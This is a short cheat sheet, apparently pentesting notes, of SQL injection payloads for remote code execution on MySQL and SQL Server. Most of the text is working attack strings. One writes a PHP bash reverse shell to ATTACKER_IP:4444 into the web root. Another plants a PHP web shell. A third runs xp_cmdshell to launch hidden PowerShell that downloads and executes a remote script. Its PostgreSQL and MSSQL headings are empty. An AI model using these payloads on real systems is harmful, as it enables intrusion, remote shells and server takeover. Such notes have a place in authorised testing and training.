Payload for RCE
MySQL
'; SELECT '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'"); ?>', null, null, null, null INTO OUTFILE '/var/www/html/tmp/shell.php'; -- //' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //SQL Server
'; exec xp_cmdshell('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(\'http://ATTACKER_IP/shell.ps1\')"') --PostgreSQL
MSSQL


Last updated
